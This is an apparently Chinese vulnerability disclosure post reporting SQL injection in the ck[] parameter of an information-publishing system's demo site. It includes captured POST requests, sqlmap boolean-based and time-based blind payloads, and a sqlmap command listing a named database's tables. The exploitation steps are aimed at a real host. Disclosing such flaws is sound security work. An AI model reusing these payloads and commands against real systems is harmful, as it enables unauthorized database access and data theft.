某信息发布系统SQL注入(demo复现)

### 简要描述： 某信息发布系统SQL注入(demo复现) ### 详细说明： 某信息发布系统SQL注入(demo复现) ### 漏洞证明： 注入在这个地方： [<img src="https://images.seebug.org/upload/201502/2815580956e2e4ed7bd5b1e209f9ade47d981fcd.jpg" alt="360截图20150228155750951.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/2815580956e2e4ed7bd5b1e209f9ade47d981fcd.jpg) 抓包看看： POST /index.php HTTP/1.1 Host: pmbdemo.youyax.com Proxy-Connection: keep-alive Content-Length: 21 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://pmbdemo.youyax.com User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://pmbdemo.youyax.com/index.php Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=e3036ed3248be3f189e336878c8e542f ck%5B%5D=2&sub_lists= 我们在sqlmap中看参数： sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Parameter: ck[] (POST) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus e (RLIKE) Payload: ck[]=2 RLIKE (SELECT (CASE WHEN (3364=3364) THEN 2 ELSE 0x28 END))& sub_lists= Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: ck[]=2 AND SLEEP(5)&sub_lists= --- [23:07:04] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.29, Apache 2 back-end DBMS: MySQL 5.0.11 [23:07:04] [INFO] fetching current database [<img src="https://images.seebug.org/upload/201502/281558475acd208eea42e76224f15e4fb4ab4340.jpg" alt="360截图20150228155840478.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/281558475acd208eea42e76224f15e4fb4ab4340.jpg) 问题在哪很明显了。 我们来复现一下demo产生的注入，首先注册登入，随便点个人发送信息： [<img src="https://images.seebug.org/upload/201502/28155925d985a53f0744ec2942b67ed00918155e.jpg" alt="360截图20150228155750951.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/28155925d985a53f0744ec2942b67ed00918155e.jpg) 然后到控制面板，点击删除抓包 [<img src="https://images.seebug.org/upload/201502/28160007f04014c25e5134d8f1e886a7b6b3665d.jpg" alt="360截图20150228155955829.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/28160007f04014c25e5134d8f1e886a7b6b3665d.jpg) 保存post发送： POST /index.php HTTP/1.1 Host: pmbdemo.youyax.com Proxy-Connection: keep-alive Content-Length: 21 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://pmbdemo.youyax.com User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://pmbdemo.youyax.com/index.php Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=e3036ed3248be3f189e336878c8e542f ck%5B%5D=3&sub_lists= [<img src="https://images.seebug.org/upload/201502/28160045bbea315daa29f025988607eec16d5e70.jpg" alt="360截图20150228160037565.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/28160045bbea315daa29f025988607eec16d5e70.jpg) 列个表看看。 sqlmap.py -r 2.txt -v 1 --tables -D "youyaxco_pmb" [<img src="https://images.seebug.org/upload/201502/28160121950fb373d1fb8f6d1fc8c1a8887a47e2.jpg" alt="360截图20150228160113382.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/28160121950fb373d1fb8f6d1fc8c1a8887a47e2.jpg)